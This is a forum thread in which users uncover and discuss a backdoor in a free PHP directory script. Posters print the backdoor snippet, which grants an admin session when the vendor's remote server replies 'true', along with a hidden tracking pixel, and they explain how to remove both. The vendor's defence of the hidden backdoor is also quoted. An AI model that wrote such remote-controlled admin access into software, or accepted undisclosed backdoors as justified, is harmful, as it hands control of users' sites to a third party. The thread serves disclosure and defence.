Backdoor in 'Free PHP Directory Script' ?

[Brian911]

I read some reviews about Biz Directory's Free PHP Directory Script and some said that there was a backdoor that allowed the programmer to enter your admin area and delete everything in your database.

I had a quick look at the scripts but couldnt find anything besides an ordinary, invisible gif.

I wouldn't want to risk my directory because of this... free script or not.
Do you run this script?

[awall19]

I run the script. I save my databases frequently. If somebody did that then you can bet he would not be selling too many more scripts.

[MarketingLady]

There are 2 dirty tricks inside the original free script:

1. File: include.php >> line 60, scroll to the right >> there is a query sending your password to biz-d.
2. File: install4.php >> line 62: <IMG SRC="http://www.directory-search.org/img/invis.gif" WIDTH=1 HEIGHT=1> >> with this hidden Gif he gets the referrer

Greets

[awall19]

Quote:

Originally Posted by MarketingLady

There are 2 dirty tricks inside the original free script:

1. File: include.php >> line 60, scroll to the right >> there is a query sending your password to biz-d.
2. File: install4.php >> line 62: <IMG SRC="http://www.directory-search.org/img/invis.gif" WIDTH=1 HEIGHT=1> >> with this hidden Gif he gets the referrer

Greets

how do you remove the part in #1 while still leaving the script operable?

if you remove that code of line from #2 does that link go away?

[Jazzee]

These are only in the free version?

[awall19]

Quote:

Originally Posted by Jazzee

These are only in the free version?

well if you do the $50 version you only take out the links back to his site...which is kinda screwed up if he leaves an easter egg link in there anyway.

not sure about the $700 version. if he does it with that then he is really messed up

[stoner3221]

Quote:

Originally Posted by awall19

Quote:

well if you do the $50 version you only take out the links back to his site...which is kinda screwed up if he leaves an easter egg link in there anyway.

not sure about the $700 version. if he does it with that then he is really messed up

The full version does not have it. I went through the whole script early today but it has been modified a lot since installation; so I’m not exactly sure if it originally contained it.
I would be one aggravated person if it did. I paid what I considered big bucks for a script that had very poor cross browser compatibility and have spent over a $1,000 dollars to make it so and it’s still not right.

[MarketingLady]

Hi awall19

Here is a little "backdoor-fix" for #1

if ($pass) {
$rand = md5(time());
$access = fopen ("http://www.directory-search.org/include_variables.php?p=$rand","r");
$access = fread($access,4);
if ($access == "true") {
session_start();
$HTTP_SESSION_VARS['admin'] = true;
header("Location: {$dir}admin_edit.php");
};
};

For my part, I don't like people programming backdoors in free available scripts. It isn't honest at all !
I don't know, if the $700 script has the backdoor too; if someone sends me the code, I need 2 days to check it out with some capable university specialists and post you all the results or, if necessary fixes.

Greets from Germany

[MarketingLady]

Sorry, awall19, I didn't answer your second question; to keep it simple, just replace the image inside <IMG SRC="http://www.directory-search.org/img/invis.gif" WIDTH=1 HEIGHT=1> by your own image, e.g. <IMG SRC="http://www.mydomain.com/imges/any_image.gif" WIDTH=1 HEIGHT=1>, the image I mean beeing located on your own server. This way, bad boys can't get the referer any more :-)

Greets

[awall19]

Quote:

Originally Posted by MarketingLady

Hi awall19

Here is a little "backdoor-fix" for #1

if ($pass) {
$rand = md5(time());
$access = fopen ("http://www.directory-search.org/include_variables.php?p=$rand","r");
$access = fread($access,4);
if ($access == "true") {
session_start();
$HTTP_SESSION_VARS['admin'] = true;
header("Location: {$dir}admin_edit.php");
};
};

Greets from Germany

I pulled this part ttp://www.directory-search.org/include_variables.php? out of my script. does that work? what details was he sending? the PHPmyAdmin variables or just the general MySQL connect info

[ssgupta]

I have sent the link of this thread to Javier GarcÃ*a of Biz Directory. Awaitng his response.

[samer]

please inform us asap !

[ssgupta]

He has sent a reply to me - reproduced below:

"The invisible image is just that, an image, unable to hurt in any way. It allows us to keep the records of installed scripts. It's more convenient than requesting the installation url every time the script is downloaded/installed.

The backdoor is password-protected, so it is impossible nobody but us can access the script, not even people with access to the script code. We added this feature several months after the first distribution of the script. We had several problems with abusive users, not only removing copyright links but also reselling the script, besides other aggressive actions. So we decided to include this tool. We have only used it once, and its use was more than justified. As the full script is distributed after the purchase, and there is no risk, it does not include this feature.

I can assure you no legal user of the script has anything to be afraid. In fact, if you or any other purchaser want a script copy without these things, I will have no problem sending it.

Regards

Javier GarcÃ*a
Biz Directory"

So it turns out they have been stealing our passwords?

[Jazzee]

That is ridiculous. Shoudn't they have to tell you about that when you download the script?

[JayM]

Unless thats written somewhere in their tos and you agree to it, it is illegal for them to do this. Thats just like distributing a trojan.

[Brian911]

Quote:

Originally Posted by Jazzee

That is ridiculous. Shoudn't they have to tell you about that when you download the script?

well, would anybody download it if they advertised it as a backdoor script?

-

thanks for the research. after having a look at the programmer's email I decided to remove the backdoor (AND the uninstall script) and install the script first of all. I also installed another script that will have a look at the script directory and the mysql database... not sure if it will remain online yet.

[Jazzee]

Quote:

Originally Posted by Brian911

well, would anybody download it if they advertised it as a backdoor script?

No, but you'd think they'd have it in fine print somewhere.

[John Scott]

That is just on the free version. And, I can see Javier's point. If I offered a script for free, and they removed copyright notices/etc, I wouldn't be too happy.

[Jazzee]

That doesn't make it right.

[John Scott]

I fail to see how it could be wrong.